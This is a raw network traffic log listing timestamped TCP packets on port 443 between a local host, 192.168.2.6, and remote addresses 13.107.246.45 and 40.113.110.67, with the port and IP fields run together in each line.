                                                                                                                                                                      Nov 21, 2024 06:24:09.525222063 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.718729019 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.721436977 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.721501112 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.721561909 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.721561909 CET49893443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.721592903 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.721617937 CET4434989313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.725141048 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.725179911 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.725266933 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.725405931 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.725416899 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.875174046 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.878261089 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.878325939 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.878401041 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.878426075 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.878441095 CET49894443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.878448009 CET4434989413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.880945921 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.880980968 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:09.881237984 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.881237984 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:09.881266117 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:10.234633923 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:10.234678984 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:10.234744072 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:10.235435009 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:10.235450029 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.269783020 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.270723104 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.270750046 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.271266937 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.271270990 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.277573109 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.278122902 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.278166056 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.278821945 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.278836012 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.370692968 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.371735096 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.371798992 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.372586966 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.372601032 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.503895044 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.504354000 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.504378080 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.504803896 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.504812002 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.659045935 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.710917950 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.713749886 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.716777086 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.716833115 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.716840029 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.716885090 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.719343901 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.722781897 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.722871065 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.823301077 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.824493885 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.824512005 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.824943066 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.824950933 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.826464891 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.826493979 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.826505899 CET49898443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.826510906 CET4434989813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.826570034 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.826636076 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.827646017 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.827646017 CET49897443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.827692986 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.827722073 CET4434989713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.839112997 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.839128971 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.839143991 CET49899443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.839149952 CET4434989913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.841747046 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.841783047 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.841844082 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.841978073 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.841986895 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.867636919 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.867714882 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.867791891 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.869920969 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.869944096 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.870006084 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.882944107 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.883019924 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.886796951 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.886814117 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.947592974 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.950864077 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.950920105 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.950972080 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.950997114 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.951010942 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.951018095 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.953481913 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.953520060 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:11.953603983 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.953774929 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:11.953794003 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.076344967 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.076426983 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.078299046 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.078309059 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.078841925 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.080528021 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.080598116 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.080605030 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.080821037 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.127342939 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.149163008 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.152308941 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.152376890 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:12.154592991 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:12.154608965 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.158200979 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:12.158253908 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.158329964 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:12.158499002 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:12.158516884 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.480171919 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.480372906 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:12.480452061 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.480700016 CET49902443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:12.480725050 CET4434990240.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.974206924 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.974433899 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.974587917 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.974813938 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.996802092 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.996824026 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.997297049 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.997303963 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.997474909 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.997486115 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.997817993 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.997822046 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.997998953 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.998053074 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.998315096 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.998328924 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.998477936 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.998483896 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:13.998805046 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:13.998809099 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.002245903 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.006161928 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.006187916 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.006541967 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.006546974 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.407082081 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.410912037 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.410986900 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.411036968 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.411036968 CET49908443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.411056042 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.411067009 CET4434990813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.426964045 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.427903891 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.428801060 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.430068970 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.430116892 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.430124998 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.430167913 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.430480957 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.430501938 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.430512905 CET49905443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.430517912 CET4434990513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.431005955 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.431050062 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.431912899 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.431917906 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.431926966 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.431930065 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.431935072 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.432106018 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.433860064 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.433901072 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.433962107 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.434070110 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.434070110 CET49906443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.434113979 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.434144974 CET4434990613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.435532093 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.435543060 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.440649986 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.440742016 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.440814972 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.441431046 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.441463947 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.446069002 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.446094036 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.446163893 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.449541092 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.449554920 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.449820995 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.449846029 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.449906111 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.453068018 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.453094006 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.455049992 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.458142042 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.458189964 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.458225012 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.458262920 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.458467960 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.458478928 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.458512068 CET49909443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.458518982 CET4434990913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.464699030 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.464720011 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:14.464787960 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.464910030 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:14.464920998 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.214888096 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.218331099 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.218347073 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.218767881 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.218772888 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.220808029 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.222177029 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.222210884 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.222594023 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.222604990 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.235704899 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.238290071 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.238333941 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.238708973 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.238718987 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.291788101 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.292306900 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.292351961 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.292831898 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.292838097 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.320153952 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.320928097 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.320935011 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.321330070 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.321333885 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.663713932 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.667212963 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.667262077 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.667311907 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.667398930 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.667398930 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.669872999 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.669887066 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.669912100 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.669979095 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.670061111 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.670190096 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.670229912 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.680732965 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.686239958 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.686311007 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.686362982 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.686403036 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.694047928 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.694089890 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.694116116 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.694132090 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.696774960 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.696818113 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.696877003 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.697041035 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.697053909 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.755347967 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.758517027 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.758630037 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.769895077 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.769925117 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.769938946 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.769946098 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.783191919 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.787199020 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.788954020 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.789043903 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.791038990 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.791105986 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.795757055 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.795775890 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.795816898 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.795823097 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.796720982 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.796726942 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.796736002 CET49915443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.796740055 CET4434991513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.799608946 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:16.799705029 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:16.799793959 CET49918443192.168.2.613.107.246.45
